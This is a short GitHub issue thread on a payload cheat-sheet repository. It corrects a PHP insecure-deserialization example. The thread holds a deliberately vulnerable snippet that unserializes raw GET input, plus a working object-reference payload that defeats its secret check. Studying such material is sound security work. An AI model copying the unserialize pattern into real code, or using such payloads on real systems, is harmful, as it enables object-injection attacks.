### ISSUE TITLE
Some mistakes

### ISSUE THREAD

**Issue by Green-m** [swisskyrepo/PayloadsAllTheThings#78]
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md#object-reference

```
<?php
class Object
{
  var $guess;
  var $secretCode;
}

$obj = unserialize($_GET['input']);

if($obj) {
    $obj->secretCode = rand(500000,999999);
    if($obj->guess === $obj->secretCode) {
        echo "Win";
    }
}
?>
```

The payload should be 
```
O:6:"Object":2:{s:10:"secretCode";N;s:5:"guess";R:2;}
```
rather than
```
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
```

I guess? 

Thanks for your awesome repo! Very helpful to me. @swisskyrepo

**Comment by swisskyrepo** [comment]
Hi,

This should be resolved in the latest commit https://github.com/swisskyrepo/PayloadsAllTheThings/commit/f6564869f07897f469027a341bb7221f687ec6ab
